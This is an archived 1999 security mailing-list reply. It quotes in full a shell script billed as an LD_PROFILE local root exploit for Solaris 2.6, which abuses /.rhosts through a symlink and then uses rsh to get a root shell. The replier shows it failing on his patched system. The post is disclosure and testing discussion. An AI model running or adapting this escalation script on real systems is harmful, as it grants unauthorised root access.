On Wed, 22 Sep 1999, Steve Mynott wrote: > works on solaris 2.6 sparc anyway... > > #! /bin/ksh > # LD_PROFILE local root exploit for solaris > # steveat_private 19990922 > umask 000 > ln -s /.rhosts /var/tmp/ps.profile > export LD_PROFILE=/usr/bin/ps > /usr/bin/ps > echo + + > /.rhosts > rsh -l root localhost csh -i Not on my system: [brock@agfa brock]$ uname -a SunOS agfa 5.6 Generic_105181-16 sun4m sparc SUNW,SPARCstation-20 [brock@agfa brock]$ cat r00t.sh #! /bin/ksh # LD_PROFILE local root exploit for solaris # steveat_private 19990922 umask 000 ln -s /.rhosts /var/tmp/ps.profile export LD_PROFILE=/usr/bin/ps /usr/bin/ps echo + + > /.rhosts rsh -l root localhost csh -i [brock@agfa brock]$ ./r00t.sh PID TTY TIME CMD 22565 pts/5 0:00 r00t.sh 22484 pts/5 0:01 bash ./r00t.sh[8]: /.rhosts: cannot create permission denied [brock@agfa brock]$ -- Brock Sides Unix Systems Administration Towery Publishing bsidesat_private
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:04:59 PDT